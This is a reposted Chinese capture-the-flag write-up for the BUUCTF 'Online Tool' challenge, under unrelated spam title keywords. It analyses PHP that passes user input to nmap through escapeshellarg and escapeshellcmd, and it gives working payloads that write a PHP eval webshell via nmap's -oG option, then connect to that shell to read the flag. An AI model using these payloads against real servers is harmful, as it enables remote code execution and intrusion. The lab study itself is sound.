当前位置: 首页> 教育> 幼教 > 婚纱摄影网站策划书_动漫专业就业前景_游戏推广_北京做网站推广

婚纱摄影网站策划书_动漫专业就业前景_游戏推广_北京做网站推广

时间:2025/7/11 19:51:21来源:https://blog.csdn.net/weixin_71914594/article/details/147620830 浏览次数:0次
婚纱摄影网站策划书_动漫专业就业前景_游戏推广_北京做网站推广

BUUCTF——Online Tool

进入靶场

在这里插入图片描述

<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}if(!isset($_GET['host'])) {highlight_file(__FILE__);
} else {$host = $_GET['host'];$host = escapeshellarg($host);$host = escapeshellcmd($host);$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);echo 'you are in sandbox '.$sandbox;@mkdir($sandbox);chdir($sandbox);echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

这段代码是接收用户通过GET请求传递的host参数,然后使用nmap工具对该主机进行扫描。同时,它会根据客户端的 IP 地址创建一个沙箱目录,扫描结果会在这个沙箱目录下输出。

主要看看escapeshellarg和escapeshellcmd函数
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含exec()、system() 和执行运算符 。
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

构造一个一句话木马payload

?host='<?php @eval($_POST["cmd"]);?> -oG shell.php '
?host=' <?php eval($_POST["hack"]);?> -oG hack.php '

在这里插入图片描述

再拼接url

http://cd33caf8-8032-4c84-8da7-e2210086dff7.node5.buuoj.cn:81/e6305cd14dbe6e1fc4041d81cb3fc9ee/shell.php

在这里插入图片描述

再用哥斯拉连接一下

哥斯拉连接失败,看了一下,shell写的没毛病

玄学网安

换了蚁剑连了一下

连上了

在这里插入图片描述

找到flag

flag{0dec71f0-da5f-47b9-8f8a-afc9111a035e}

下播!

在这里插入图片描述

关键字:婚纱摄影网站策划书_动漫专业就业前景_游戏推广_北京做网站推广

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: